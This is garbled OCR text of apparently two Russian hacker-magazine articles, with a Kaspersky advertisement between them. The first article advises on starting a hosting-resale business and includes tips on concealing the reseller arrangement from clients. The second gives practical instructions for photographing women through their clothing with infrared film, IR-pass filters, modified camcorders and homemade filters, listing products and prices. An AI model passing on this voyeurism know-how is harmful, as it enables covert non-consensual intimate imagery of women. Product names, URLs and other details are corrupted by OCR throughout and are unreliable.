АДРЕСОВ. КОМПАНИЙ, ОКАЗЫВАЮЩИХ ЭТУ 
УСЛУГУ, ДЕЙСТВИТЕЛЬНО ОЧЕНЬ МНОГО. 
ЭТОМУ СПОСОБСТВУЕТ РАЗВИТИЕ ИНТЕРНЕ- 
ТА И, СЛЕДОВАТЕЛЬНО, ДОХОДНОСТЬ ХОС- 
ТИНГОВОГО БИЗНЕСА. НО ПОМИМО ВЫШЕ- 
ПЕРЕЧИСЛЕННЫХ ФАКТОРОВ СУЩЕСТВУЕТ 
И ЕЩЕ ОДИН — СТАТЬ ХОСТИНГ-ПРОВАЙДЕ- 
РОМ МОЖЕТ ЛЮБОЙ ЖЕЛАЮЩИЙ, НЕ ВКЛА- 
ДЫВАЯ В ЭТУ ДЕЯТЕЛЬНОСТЬ СЕРЬЕЗНЫХ 

СРЕДСТВ I Данила ака хЬ\\ (з1теат@05коІпеТ.ги, ісд 334437228) 



Открой свою 
хостинг-контору 

[основы] Хостинг — это не что иное, как вы- 
деление места на диске провайдером под 
нужды пользователя. Он бывает платным и 
бесплатным. Во втором случае тебя, ско- 
рее всего, попросят (читай заставят) раз- 
местить рекламный баннер, размеры кото- 
рого зависят от качества услуг. Так, всем из- 
вестный пагосі.ги встраивает баннеры 
100x100 точек в сайты своих клиентов, а де- 
тище компании Адаѵа Ііоіт.ги (010, 01) — 
рекламное окно размером 480x60 пиксе- 
лов. Встречаются и бескорыстные хостеры, 
которые ничего не просят взамен. Обычно 
такие проекты создаются энтузиастами и 
пространство предоставляют, как правило, 
только качественным сайтам аналогичной 
тематики. Чаще всего за словосочетанием 




[так выглядит та самая панель управления сРапеІ] 




«хостинг-провайдер» кроется команда из пяти человек, обслужи- 
вающих два-три сервера. Чтобы вывести серверы в онлайн, хос- 
тинг-компании приходится арендовать у оператора скоростную 
линию, оплачивая весь проходящий по ней трафик. Так что если в 
тарифах провайдера есть план анлимитный, то имей в виду: хостер 
просто надеется на то, что твой сайт сожрет меньше трафика, чем 
дозволено, так как последний для него самого небесплатный. Ав- 
тору известны случаи, когда из-за такого перебора хостинговые 
компании заставляли веб-мастеров «провинившихся» сайтов доп- 
лачивать им за перерасход, и такие случаи вовсе не редки. 

[как зарабатывают хостеры] Все три вида расходования диско- 
вого пространства себя полностью оправдывают. У них есть как 
достоинства, так и недостатки. В первом случае все ясно: хостер 
получает деньги напрямую от клиента, и это главный плюс такого 
направления. Но есть и минус: клиентов будет гораздо меньше, 
чем у двух других категорий, а чтобы вообще хоть что-то зарабо- 
тать, необходимо проводить регулярные рекламные компании, 
стоимость которых может зашкаливать за $300 в месяц. Вариант 
номер два. Если провайдер предоставляет по-настоящему каче- 
ственную бесплатную услугу, то пользователи потянутся к нему 
сами. Конечно, нужно покрутить рекламу на соседних сайтах, но 
обойдется это куда дешевле, чем в первом варианте. Да и наб- 
рав пользователей, можно поначалу показывать на их сайтах 
свою рекламу, тем самым становясь еще известнее. Для извлече- 
ния финансовой выгоды из этого дела тебе понадобится найти 
рекламодателя, который и будет финансировать всю эту мини- 
империю. Сам посуди, каковы будут обороты баннерной рекла- 
мы, если на твоих землях расположится пара сотен проектов. Но 
это только теория. На практике все обстоит иначе. Во-первых, 
найти рекламодателя, который согласится платить нужную сумму 
(хотя бы для окупаемости), будет очень сложно. Не стоит забы- 
вать и про юзеров, постоянно стучащих в асю за техподдержкой. 
Игнорировать их — суть отдать клиентов более развитым компа- 
ниям. Поэтому если ты хочешь обозначить свой проект как бесп- 
латную площадку, тебе необходимо как минимум три человека, 
иначе успеть за всем хозяйством будет физически невозможно. И 
наконец, третий вариант — предоставление безвозмездного хос- 
тинга. Такая услуга оказывается в основном для того, чтобы соз- 
дать сообщество вокруг конкретного веб-проекта. Обыкновен- 
ная раскрутка, говоря простым языком. Очень часто из бесплат- 
ных такие проекты, набрав популярность и пользователей, пере- 
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растают в платные или условно 
бесплатные службы. Этот шаг 
оправдан на все 100%, так как 
известности у проекта не уба- 
вится, да и поголовного ухода 
пользователей наблюдать не 
придется. Ведь поддомен, ко- 
торый раскручивался ими, воз- 
можно, не один год, принадле- 
жит хостеру, и уйти — значит 
потерять всех посетителей, од- 
ним словом — убить проект (во- 
обще-то, это два слова! — 
Прим. ЬООМік.). Что же касает- 
ся условно бесплатных хосте- 



ров, то таковыми они становят- 
ся, как правило, на небольшой промежуток времени. Формули- 
ровка «условно бесплатный» означает, что за место, занятое 
пользователем, плата взиматься не будет, однако дополнитель- 
ные функции в виде поддержки РНР и МуЗОІ_ будут платными. Нап- 




[компания Адаѵа известна больше своими вспомогательными сервисами: 
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ример по такой схеме работает и /еЬзегѵіз.ги. 

[реселлинг] Теперь ты имеешь представление о способах извле- 
чения выгоды из подобного проекта. Настало время узнать, откуда 
же читатель сможет раздобыть свободное дисковое простран- 
ство. На самом деле все просто. Многие коммерческие хостеры 
предоставляют такую услугу, как реселлинг. Ее смысл заключает- 
ся в выделении под нужды клиента большого дискового простра- 
нства. Оно продается оптом. Как в случае с любыми другими това- 
рами существует нижний лимит, так и в данном случае есть мини- 
мальная дисковая квота. «2 Гб на диске, 15 Гб трафика, все вклю- 
чено, $44/мес.» — типичное реселлерское предложение. Выпла- 
тив указанную в прайсе сумму, ты получишь панель управления 
всем этим добром. Чаще всего это сРапеІ (ѴѴНМ). При помощи та- 
кой приблуды клиент сможет управлять дисковым пространством 
и трафиком: создавать новые тарифные планы, открывать/удалять 
аккаунты, устанавливать лимиты на почтовые ящики, базы данных и 
т.д. Очень удобная вещь. К сожалению, она полностью на анг- 
лийском языке, что мешает быстрому освоению. В твоей голове 
наверняка пробежала мысль об установке и опробовании такой 
панели на локальном сервере. Не трать время зря — для своей 
работы скрипт коннектится к серверу сайта компании, что пол- 
ностью исключает использование варезной версии. Я не хочу 
превращать статью в руководство по эксплуатации этой панели, 
при желании ты и сам сможешь во всем разобраться (потрепав 
нервишки суппорту), к тому же в линках есть ссылка на неплохой 
мануал. Кстати, создав аккаунт для клиента, юзер, скорее всего, 
будет иметь возможность наблюдать за состоянием сервера. 
Большинство провайдеров выделяют панели управления аккаун- 
том, при помощи которых юзер будет видеть количество израсхо- 
дованного им трафика, объем БД и занятого места в целом. Но 
речь не об этом. Для того чтобы твой будущий проект был по-нас- 
тоящему популярным, нужен трезвый расчет. И начать стоит с вы- 
бора сервера, у которого и будет арендоваться пространство 
для дальнейшей перепродажи. Чем же руководствоваться при 
выборе будущей площадки? На этот вопрос каждый отвечает 
сам. Кто-то согласен смириться со скоростью серверов в обмен 
на низкую плату, а кто-то нет. Вот краткий перечень параметров, 
по которым и нужно судить о привлекательности площадки: 

И Анонимность. То, что гарантирует каждый владелец площад- 
ки, но не всегда соблюдает. Что испытает твой клиент, если пос- 
ле прочтения липовой истории о «крупном дата-центре» пробьет 
домен по базе ѴѴГюІЗ? У него возникнет много вопросов, напри- 
мер почему владельцы «дата-центра» используют чужие ЭІ\ІЗ ли- 
бо же ІР сервера числится совсем за другим провайдером. Для 
предотвращения подобных недоразумений отдавай предпочте- 
ние тому прову, который выделяет бесплатные ЭІ\]5-серверы. По- 
мимо целенаправленной проверки, тебя могут пропалить и со- 
вершенно случайно. Например письмо от панели управления, 
извещающее юзера об израсходовании трафика, может содер- 
жать е-таіі администратора сервера. Домен, в котором этот 
мейл находится, будет резко отличаться от твоего. Это повлечет 
за собой ряд лишних вопросов со стороны клиентов. Читая все 
это, ты можешь задать логичный вопрос: «А почему вообще надо 
скрывать свою реселлерскую сущность?». Клиенты запросто 
могут обратиться напрямую к оператору реселлера. Без пос- 
редников. Не поможет даже то, что цены у него на порядок выше, 
условия невыгодны, а суппорт несвоевременно отвечает на воп- 
росы. Не любят люди посредников. 

\ 2 \ Ценовая политика. Чуть выше я привел сумму в $44. Не все го- 
товы платить такие деньги, учитывая еще и то, что функции, за ко- 
торые и устанавливается столь высокая плата, не будут востре- 
бованы. Новичку целесообразней подыскать провайдера, пре- 
доставляющего небольшую дисковую квоту и, соответственно, 
требующего меньшей ($20-25) оплаты за свои услуги. Стоит об- 
ращать внимание на выделяемый трафик и его дополнительную 
стоимость ($ 1 /Гб считается нормой). 

[з] Характеристики и функциональность серверов. Один из важ- 
нейших факторов. Большинство клиентов очень требовательно к 
скорости и функциональной начинке серверов. Зачастую имен- 
но это и влияет на конечное решение. Поэтому ты, как дальновид- 
ный предприниматель, должен изначально позаботиться о пре- 
дотвращении гневных писем в свой адрес по поводу производи- 
тельности. Если кто-то думает, что поначалу на скорости работы 
сервера можно сэкономить, а потом переехать на более быст- 
рую площадку, то он сильно заблуждается. Те, кто хоть раз про- 
бовал переехать на другой сервер, меня отлично поймут, не гово- 
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[любимый форум каждого реселлера — ѵѵеЫпозйпдІаІк.ги] 

ря уже о тех, кто «перевозил» сразу несколько проектов. Задача 
очень непростая и рискованная — один неверный шаг, и ты рис- 
куешь потерять клиентов. Какие проблемы могут возникнуть? Нап- 
ример разные пути к компиляторам (к тому же РегГу) приведут к 
простою ресурсов, использующих данную технологию, а вовре- 
мя предупредить всех клиентов может и не получиться. Бывает и 
так, что такой поворот событий становится настоящим сюрпри- 
зом для самого реселлера, невнимательно отнесшегося к харак- 
теристике будущей площадки. Но это ерунда по сравнению с 
процессом изменения записей в ЭИЗ-серверах твоего домена. 
Внести пару сотен доменов клиентов с координатами — занятие 
неблагодарное. Вернемся к теме. Функциональность — подде- 
ржка баз данных (обычно неограниченное количество), динами- 
ческих языков (РНР, РегІ), файлов .ГіГассезз и т.д. Тут все просто и 
понятно — чем больше, тем лучше :). 

И Перерасход. Случается так, что один из клиентов не уклады- 
вается в отведенные ему рамки и трафик перерасходуется. Каж- 
дый провайдер в подобной ситуации ведет себя по-разному. Те 
площадки, которые не допускают перерасход, просто блокиру- 
ют такой аккаунт вместе с сайтами клиентов. Думаю, нет необхо- 
димости объяснять, какими последствиями это обернется. Дру- 
гие же так не поступают (конечно, и у них есть предел, обычно 
пара гигабайт), они просят быстрее оплатить перерасход и да- 
ют на это, как правило, двухнедельный срок. 

Ц] Политика хостера. Перед тем как начать рассматривать ре- 
селлерские планы хостера, внимательно изучи его политику. Ав- 
тору известны случаи, когда из-за нарушений правил удалялись 
реселлерские домены, на которых висели сайты клиентов. А при- 
чины были разные: кто-то из клиентов решил заняться спамом или 
детской порнографией, что является явным нарушением правил 
большинства провайдеров. Так как нечистому на руку клиенту ре- 
селлер по глупости дал поддомен, то удален был и поддомен, и 
сам домен, и все остальные его поддомены (адреса клиентов 
должны быть вида ГіГГр://твой_домен.ги/~логин_клиента, а не 
Біір://логин_клиента.твой_домен.ги). Бывает и так, что в список ог- 
раничений входит и объем потребляемых ресурсов сервера. 
Например лимит на использование оперативной памяти. 

[б] Суппорт. Очень важный пункт, особенно для новичка. Понача- 
лу будет возникать очень много вопросов, и важно вовремя полу- 
чить на них ответ. К тому же, может получиться так, что клиент за- 
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даст вопрос, ответ на который ты знать не будешь. Придется сту- 
чать в техподдержку. Если ответ придет через месяц, значит, и 
клиенту ты сможешь ответить спустя этот же срок. 

[аренда сервера] Если читатель всерьез будет заниматься опи- 
сываемым в этой статье ремеслом, то спустя пару месяцев у не- 
го наберется несколько десятков или даже сотен клиентов. В 
этом случае из экономических соображений куда выгоднее пе- 
реехать на другую хостинговую площадку с начальными тарифа- 
ми по 5 Гб. Проще говоря, куда дешевле будет взять один пакет 
на пять гигов, чем набирать этот же объем отдельными пакетами 
по 100 Мб. Но еще выгоднее взять в аренду сервер. Ты получишь 
в свое распоряжение минимум 20 Гб, в два раза больше трафи- 
ка и возможность настройки машины. Единственный отрицатель- 
ный момент — цена. Аренда стоит недешево (от $100), но если ты 
уже крупный реселлер, то эта рамка проблемой для тебя не бу- 
дет. Причем арендовать сервак можно не только у хостинговых 
компании. Попробуй договориться с админом сервака своего 
универа, за определенную плату вы найдете общий язык. 

[сайт] Лицо фирмы. Он должен не только рассказывать посетите- 
лям обо всех новостях компании и тарифах, а еще и внушать дове- 
рие. В интернете очень много кидал, и пользователи крайне нео- 
хотно расстаются со своими кровными, а если и делают это, то 
только тогда, когда полностью доверяют продавцу. А о каком до- 
верии может идти речь, если невооруженным глазом видно, что 
представительство «компании» наспех сверстано в ѴѴогсГе? Если 
посетитель засомневается в профессионализме, то денег платить 
не будет. Все должно быть на высшем уровне: и текст, и оформле- 
ние. Назревает вопрос: «Что делать, если дизайнер из меня ника- 
кой? Не бросать же из-за этого такую затею?». Выходов из ситуа- 
ции очень много. Например никто не мешает нанять профессио- 
нального веб-мастера, обратиться в дизайн-студию, попросить 
друзей. Но за это придется платить, причем немало. Веб-студия 
попросит минимум $200, веб-мастер — чуть меньше, в районе $80 
- 100. Но и качество будет соответствующим. Есть еще одно попу- 
лярное решение проблемы — шаблоны. Казалось бы, что может 
быть удобней: выбрал, скачал, отредактировал. Все просто и 
бесплатно. Но при таком подходе нужно учитывать ряд моментов. 
Главный из них — нельзя скачивать шаблоны из открытых, широко 
известных порталов типа ѵѵоѵѵеЬ.ги. Связано это с тем, что буду- 
щие клиенты по природе своей тоже веб-мастера и наверняка не 
раз посещали подобные порталы. Они сразу же узнают шаблон и 
дальше главной страницы не пойдут. При желании можно найти 
забугорный сайт аналогичной тематики и скоммуниздить дизайн 
оттуда, но так как это все же воровство, а красть несолидно, оста- 
навливаться подробно на этом пункте не будем. Гораздо проще 
приобрести шаблон на распродажах, которые периодически 
устраиваются дизайн-студиями (продаются разработки, за кото- 
рые клиенты отказались платить, или же простенькие наброски). 
Цены, как правило, в несколько раз ниже аналогичной работы на 
заказ. При выборе макета ты должен исходить из его направлен- 
ности и возможности адаптации под собственные нужды. То есть 
если в твоих планах стоит развернуть настоящий портал, посвя- 
щенный определенной теме, и в довесок к сервисам приписать 
еще и предоставление дискового пространства, то выбор в поль- 
зу макетов типа СопГепГ-Кіпд вполне оправдан. 

Что же касается непосредственно самого сайта — учитывай, что 
ресурсы, предлагающие только платные сервисы, среди поль- 
зователей особой популярностью не пользуются. Так что имеет 
смысл призадуматься о наполнении сайта тематическим контен- 
том (дополнительный плюс при поисковой оптимизации), напи- 
сании бесплатных сервисов в виде ГгеетаіІ, раздачи ісд иіп, фо- 
румов и досок объявлений. 

[домены] Помимо продажи хостинга, ты будешь иметь доступ и к 
заведению новых доменных имен. Открытие нового имени будет 
на порядок дешевле, нежели покупка его у провайдера. Напри- 
мер за домен в международной зоне (.сот, .пеГ, .огд) придется 
выложить всего $9. Национальные домены ценятся намного вы- 
ше. Правда, управление доменным пространством в большин- 
стве случаев будет осуществляться не через панель управления, 
а посредством переписки с провайдером. 

[основные инструменты] Пожалуй, единственный отрица- 
тельный момент в организации собственной хостинг-пло- 
щадки — это заведение новых аккаунтов. Его придется осу- 
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ществдять вручную. Для этого тебе выделят специальную па- 
нель управления, скорее всего, ѴѴМН — лучшую в своем ро- 
де. Увы, русифицированной ѴѴМН не существует, и тебе при- 
дется потратить часок-другой, дабы разобраться, что к че- 
му. Сделать это можно, кстати говоря, и перед принятием 
решения об открытии собственной конторы. Многие провы 
предоставляют демодоступ к такой панели, и ты сможешь 
вдоволь попрактиковаться. 

[проблемы продвижения] Продажа хостинга — самый настоящий 
бизнес, требующий серьезного подхода. Увы, этим ремеслом за- 
нимается очень много народу. Из этого можешь делать выводы, 
насколько серьезна конкуренция. При открытии собственного 
хостинг-проекта будь готов к посещаемости 5-10 человек в день. 
Столь скромные цифры и есть ниша начинающего хостера. Чтобы 
добиться более или менее хорошей посеща емости, а следова- 
тельно, дохода, необходимо изрядно потратиться на продвиже- 
ние проекта в Сети. Это может быть реклама в тематических рас- 
сылках, баннеры на крупных сайтах и т. д. На эту тему написано не- 
мало книг, и при желании можно добиться хороших результатов. 

[общение с клиентами] Если ты решил серьезно заниматься 
таким ремеслом, как продажа хостинга, будь готов к лавине 
вопросов, которые обрушатся сразу после регистрации 
10-12 пользователей. Причем вопросы могут быть как сложны- 
ми, для ответа на которые тебе самому придется стучать за 
помощью в суппорт, так и глупыми, идущими в разрез с темой 
(например, спрашивали о том, как установить локальный сер- 
вер, а один раз даже просили исправить синтаксическую 
ошибку в скрипте). Ответы на подобные вопросы нужно давать 
в стиле «не наш профиль, извините». Иначе писем будет прихо- 
дить еще больше, а сайт прослывет как справочная служба. 
Это, конечно, с одной стороны хорошо, но с другой — отве- 
чать на 100 - 150 писем в день — занятие утомительное. К тому 
же, что мешает ответить ссылкой на ресурс, содержащий 
нужную информацию? Если вопрос действительно интересен 
и актуален, ответ на него стоит публиковать на сайте в разде- 
ле ЕАО. Этот ход существенно облегчит поддержку клиентов и 
привлечет новых. Ни в коем случае не удаляй письма в трэш. 
Зиррогі для многих является приоритетным фактором при вы- 
боре хостинга. Так что если ты не хочешь иметь репутацию 
Ііоіт.ги, лучше всего отвечай хотя бы ссылкой. 

[заключение] Какая выгода в реселлинге? Во-первых, ты мо- 
жешь разместить несколько проектов на одном аккаунте, по- 
лучить неограниченные возможности. И все это в несколько 
раз дешевле обычных тарифов других провайдеров. Мо- 
жешь, как уже говорилось, открыть свою хостинговую конто- 
ру. Вариантов множество. Столько же и вопросов, возникаю- 
щих при прохождении пути от гоокіе до крутого хостинг-оли- 
гарха :). Если у тебя возникнут какие-либо вопросы, то ты 
всегда можешь связаться с автором и заодно высказать свое 
мнение о данном материале :) © 
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Кяярегкк^) РегарпаІ Зесигііу Зиііе — 

новый продукт от Лаборатории Касперского, 
который выводи? защиту Вашего компьютера 
на качественно иной уровень. 

Это интегрированное решение способно про- 
тивостоять вирусам любык модификаций. снв- 
му н иакерским атакам 

Максимальная защита поддерживается самой 
быстрой в мире реакцией, на новые угрозы и 
ежечасными обновлениями антивирусный баз. 

КЛОіІІ^КоГо 

тел. (095) 79747-00 ютпѵ казреюку/и 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕПНЫМ НЬЮСЫ 



} 




Раздень ее нежно 

ВЕСНА — ПОРА ПОДСНЕЖНИКОВ И ЯРКИХ 
ГОРМОНАЛЬНЫХ ПЕРЕЖИВАНИЙ. ДЕВУШКИ 
СБРАСЫВАЮТ ЛИШНЮЮ ОДЕЖДУ ДОНЕЛЬ- 
ЗЯ. НО КАК БЫ НИ БЫЛА РАСКОВАНА СОВРЕ- 
МЕННАЯ МОДА, МИНИМУМ ЛОСКУТКОВ 
ОБЫЧНО ОСТАЕТСЯ, ПРОВОЦИРУЯ СИЛЬНОЕ 
ЖЕЛАНИЕ ЗАГЛЯНУТЬ ИМЕННО ПОД НИХ. ИЗ 
ПЯТИ ОСНОВНЫХ ЧЕЛОВЕЧЕСКИХ ЧУВСТВ 
ГЛАВНЫМ ЯВЛЯЕТСЯ ЗРЕНИЕ. А ВОТ ПРЕС- 
ЛОВУТОЕ ШЕСТОЕ ЧУВСТВО — ЭТО, НЕСОМ- 
НЕННО, ПОДГЛЯДЫВАНИЕ. ГОВОРЯТ, ЕГО 
ЦЕНТР НАХОДИТСЯ ГДЕ-ТО НА УРОВНЕ 
СПИННОГО МОЗГА И НЕ ПОДКОНТРОЛЕН КО- 
МАНДАМ СВЕРХУ (ВРУТ, НАВЕРНОЕ — ПРИМ. 
ЛОЗОВСКОГО) I Слава Ансимов ака АЫЗІ (апзі@іп? 05 .ги) 



Правда и мифы 
о красной пленке 

[легенда о красной пленке] Когда-то очень давно, когда 
фотоаппараты еще были пленочными ;), ходила среди 
тогдашней детворы красивая легенда о загадочной 
красной фотопленке. Вставляешь ее в простой фото- 
аппарат, снимаешь одноклассниц (в смысле, фотог- 
рафируешь ;)), затем все это дело проявляешь, печа- 
таешь и... созерцаешь то, что давно жаждал увидеть. 
Все мечтали достать эту таинственную пленку. Кое-кто 
хвастал, что сам ее видел или разглядывал сделан- 
ные ею фотографии в иностранном журнале. 

Особо продвинутые деловито уточняли, что пленка 
эта не красная, а инфракрасная и что стоит она на 
вооружении в шпионских войсках или, как сейчас 
принято говорить, в спецслужбах. С улыбкой вспоми- 
ная о тех временах, нельзя не отметить, что умники те 
были не так уж далеки от правды. Конечно, у шпионов 
фотоаппараты были покруче, но и для простых граж- 
дан кое-что выпускалось. 

Называлось это инфракрасной пленкой «Эктахром» 
производства компании «Кодак» (Кобак Екіасіпготе 
ІгтГгагесІ Аего Рііт). А предназначалась она для воен- 
ной аэрофотосъемки, что, впрочем, совсем не меша- 
ло использовать ее фотолюбителям. Пленка отчасти 
была чувствительна к некоторым цветовым компонен- 
там видимого света, что в сочетании с инфракрасной 
составляющей позволяло получать причудливые фан- 
тастические картинки. 

При домашней печати ванночки с проявителем и фик- 
сажем нужно было обертывать фольгой, так как пласт- 
масса пропускала инфракрасные лучи. 

Самое-то главное, проникающая способность 
ближнего инфракрасного диапазона (700 - 900 на- 



® В четвертом терминале аэ- нометров) замечательным 
репорта Хитроу в Лондоне образом позволяла загляды- 
установлен «раздевающий» вать под одежду. Однако ву- 
сканер-рентген на основе айеризм в те времена был в 

миллиметровых волн глубоком подполье, да и ин- 

тернета еще не было. Фотог- 
рафии с просвеченными соседками остались разве что у ко- 
го-нибудь в частных архивах. Инфракрасный «Кодак» (впро- 
чем, как и обычный) в советские времена продавался только 
в капиталистическом забугорье и шаловливого хихиканья не 
вызывал, несмотря на бурлящую там сексуальную револю- 
цию. Пользовали его фотографы-энтузиасты, снимая, в основ- 
ном, пейзажи. Об эротическом боевом применении мечтали 
только подростки в советской России. 

Сейчас подобное фотопленочное чудо в формате 35 мм можно 
найти под названием Кобак ЕкіасНготе Рго^еззіопаІ Іпігагесі ЕІР 
Еііт или просто ЕкіасНготе Іпігагесі. Стоит оно всего 22 доллара. 
Пленка эта прихватывает и видимый спектр (400 - 700 нм), и даже 
ближний ультрафиолетовый (250-400 нм), поэтому картинка, сде- 
ланная не в полной темноте, получится вполне узнаваемой по си- 
луэтам. Довольно абстрактными будут цвета (псевдоцвета). Их 
комбинации можно менять светофильтрами на объективе. 

[обнаженка на поток] В нынешнюю цифровую эпоху всевозмож- 
ных инфракрасных камер, тепловизоров, ночных прицелов и тому 
подобного просто завались. Все они имеют существенное преи- 




[лучше всего просвечиваются купальники, шелк и вся синтетика] 



ѵѵѵѵѵѵ.окііск.ги 







Инструкции по изготовле- 
нию самодельного ИК- 
фильтра из пленки 
Ы\р:///іиіі .гі{.еби/~апбрр\і/\е 
хІ-іпІгагесПіІІег.ІіІтІ. 




Все об инфракрасной фо- 
тографии: 

Шр://іѵѵіѵѵ.рШоѵіеЬ.ги/ргорІю 

іо/ЫЫіоіека/МеіобоІод/02.йіш 

ЫірУ/еоз.птілі/агіісІев/Іпѵі 

зіЫеУІогШ/ 

Шр://зеагсІі .рЬазе.сот/зеаг 
с\і?ц=Шагеб 

Шрі/Мшѵѵ.доодІе.сот/зеаг 
с/? ?д=іп Ігагеб+даНегу 



мущество перед пленочными 
фотоаппаратами. Как бы ни бы- 
ла хороша кода ко вс кая крас- 
ная пленка, дело это во всех 
смыслах темное. Получить нуж- 
ный эффект просвечивания одежды, а не просто цветовую фан- 
тасмагорию довольно нелегко. Это зависит от многих парамет- 
ров освещения, экспозиции, сочетания светофильтров и других 
факторов. В пленочном фотоаппарате мы не можем наблюдать 
конечное изображение сразу, поэтому то, что потом получается 
на снимке, достаточно непредсказуемо. 

Способность цифровой аппаратуры показывать и корректиро- 
вать результат в процессе съемки обусловила грандиозный про- 
рыв. Кроме того, в наше время не только техника стала совершен- 
нее, но и нравы гораздо свободнее. Промышленность пошла 
навстречу пожеланиям граждан и выпустила бытовой прибор для 
подглядывания сквозь одежду. 

Изделие фирмы КАУА-Оріісз именуется Іпітагесі Зее-ТПгоидП Ріііег 
РР и представляет собой насадку-фильтр, которая надевается на 
объектив цифровой или даже обычной видеокамеры. 

Как известно, изображение в этих устройствах воспринимается 
матрицей ПЗС (прибор с зарядовой связью (ССЭ)). Открытыми 
эти матрицы воспринимают не только видимый, но и ближний инф- 
ракрасный диапазон («пеаг іпітагесі» — І\Ш — 700 -1400 нм). Пос- 
кольку в обычном режиме он не нужен, в объективы камер произ- 
водители вставляют светофильтр, который инфракрасную часть 
спектра отсекает. А пассивный фильтр КАУА РР делает совер- 
шенно обратное — тормозит большую часть видимого участка и 
пропускает только инфракрасный. Если поменять родной фильтр 
на КАУА, то камера превратится в инфракрасную. 

Результат можно наблюдать на фотографиях. Тонкая и облегаю- 
щая одежда просто исчезает!.. И всего за каких-то 140-150 услов- 
но зеленых единиц, в зависимости от калибра объектива. Кстати, 
ИК-фильтры производят и другие фирмы, предлагающие весьма 
широкий диапазон цен. 

У разработчика описан еще один вариант визуального прощупы- 
вания тела, дающий лучший эффект проникновения, но малоп- 
рактичный в полевых условиях. Он основывается на физическом 
эффекте люминесценции объекта в ИК-диапазоне при освеще- 
нии его исключительно видимым светом. То есть девушку-цель 




УДОБСТВУ 



Окііск 323 М 
ОрбсаІ Мойве 



окііск 780 І_ 
Миібтебіа КеуЬоагб 



і Когда-то в древности Великий Учитель решил испытать 
т своих учеников, предложив им выбрать для себя мечи. 

° Один ив них выбрал легкий меч, надеясь сохранить силы 
§ в долгом походе. Другой выбрал длинный меч, надеясь 
| поразить им больше противников с безопасного 
^ расстояния. 

ш Но самым мудрым оказался третий ученик, который 
^ выбрал для себя самый удобный меч, ставший продолже- 
^ нием его руки. 

Р Удобство — вот разумный выбор! 



[хакер 04 [76] 05 040 ] 




[художественная инфракрасная фотография сквозь «розовые очки»] 



придется освещать лампочкой, на которую надет фильтр, задер- 
живающий І\Ш-излучение. Для камеры потребуется опять-таки 
обратный фильтр РР. Такой задерживающий ІСР-фильтр (ІпТгагесІ 
СиР РМТег) фирма предлагает приобрести за $20. При этом с ум- 
ным видом отмечается, что вместо лампочки с фильтром сгодится 
монохромный лазер видимого диапазона ;). 

Некоторые видеокамеры, такие как Зопу МідОРзРюР, сами по 
себе имеют ночной режим съемки, при котором стандартный 




[летом в аквапарках и на пляжах днюют и ночуют охотники в инфракрасных очках] 



[КАК ЛАРУ КРОФТ РАЗДЕЛИ] 

Года три назад компания МаРгох представила видеокарту 
МасИ Зтаск 0500, которая должна была конкурировать с 
ОеРогсе 2 и Вабеоп. Внимание прессы карта привлекла 
одной уникальной особенностью — способностью разде- 
вать людей. Фирменная технология интерполяции тексту- 
ры позволяла изображать одетых людей так, как если бы 
одежда была снята. Компания заявляла, что это первая 
видеокарта, позволяющая видеть сквозь одежду. 
Вице-президент Маігох по маркетингу Тодд Сандс с юмо- 
ром позиционировал свое устройство: «Мы полагаем, что 
любители порнографических игр и подобные извращен- 
цы полюбят эту карту. Эта карта потрясет производство в 
целом. Напуганы не только производители других видео- 
карт, в затруднении сайты обнаженных знаменитостей. 
Нет необходимости платить за них, когда вы можете 
просто найти любое оцифрованное изображение и смот- 
реть его необработанным». 

Эта старая новость с сайта ѵѵѵѵѵѵ.ЬЬзроі.сот сильно сма- 
хивает на фейк, однако с соответствующим програм- 
мным обеспечением нет ничего невозможного. 




А еще ИК-фильтры 
позволяют заглянуть за 
солнцезащитные очки и 
тонированные стекла. 

Сайт производителя «разде- 
вающих» очков 
шшш.асіѵапсесі- 
іпіеііідепсе.сот. 



нсщс ѵіг\-ірилыры задерживающий ИК-фильтр 

[М) позволяют заглянуть за просто отстегивается. Одна- 

солнцезащитные очки и ко в таком варианте можно 
снимать только ночью, днев- 
ной свет будет забивать мат- 
рицу ПЗС, что просто непри- 
емлемо. Зато именно эта ка- 
мера рекомендуется КАУА, 
так как от нее легко отстеги- 
вается ИК-фильтр. Для прочих 
камер имеются инструкции по разборке объектива и ручному 
выдиранию фильтра. Есть также вариант полной замены объ- 
ектива на «правильный» за 250 долларов. 

Именно вокруг Зопу ІМідГіізГюі разгорелся самый громкий скан- 
дал в истории красной пленки. Модели, выпущенные до 12 авгус- 
та 1998 года, могут вести инфракрасную съемку при ярком днев- 
ном свете — со всеми вытекающими. Агрегаты, сошедшие с кон- 
вейера в августе-декабре 1998-го, модификации не подлежат. 
Зато все последующие модели можно на раз хакнуть при помо- 
щи отвертки. 



[все своими руками] Если нет охоты заказывать в интернете и тра- 
тить сотни родных американских денег, можно радостно поти- 
рать собственные очумелые ручки! 

Во-первых, вредный ИК-фильтр можно вывинтить из объектива по 
инструкциям на сайте ѵѵѵѵѵѵ.коуо-оріісз.сот. Если это будет 
проблематично, останется пробивать его во время съемок дли- 
тельными экспозициями. Естественно, в этом случае можно толь- 
ко делать фотографии, о видеосъемке речи быть не может. 
Проверить готовность твоей камеры к восприятию ИК-излучения 
очень легко. Берешь пульт ДУ от телика и жмешь кнопки, направив 
пульт прямо в объектив. Если на экране цифровика точка ИК-све- 
тодиода пульта светится ярко, то камера сгодится. 

Самопальный фильтр для устранения видимого диапазона прос- 
то вырезается по форме объектива из засвеченной и проявлен- 
ной цветной слайдовой фотопленки. Обычно такие кусочки быва- 
ют в самом начале рулона отснятой пленки. Конечно, качество 
фильтра заметно хуже настоящего, но попробовать что-то изоб- 
разить можно. При удачном освещении получится даже кого-ни- 
будь раздеть. А если и не выйдет, то фантастическими пейзажами 
природы можно насладиться точно. 



[гонки на раздевание] Идея домашней камеры с пассивным 
инфракрасным фильтром оказалась весьма плодотворной в 
плане маркетинга. Год назад тайская компания АбѵапсесІ 
ІпіеІІідепсе, проявив чудеса миниатюризации, представила 
«раздевающие» очки Х-РеНесі Ѳоддіез. Конечно, название, ас- 
социирующееся с рентгеном (икс-лучи), отношения к нему ника- 
кого не имеет. Это просто-напросто две миниатюрные камеры с 
ИК-фильтрами разрешением 470 строк и выходом на видеомаг- 
нитофон. Несмотря на инфракрасную сущность, очки не пред- 
назначены для использования в темноте. Они дают раздеваю- 
щий эффект при слабом и ярком освещении. Заряда аккумулято- 
ра хватает на 7 часов разглядываний. Приобрести данный агре- 
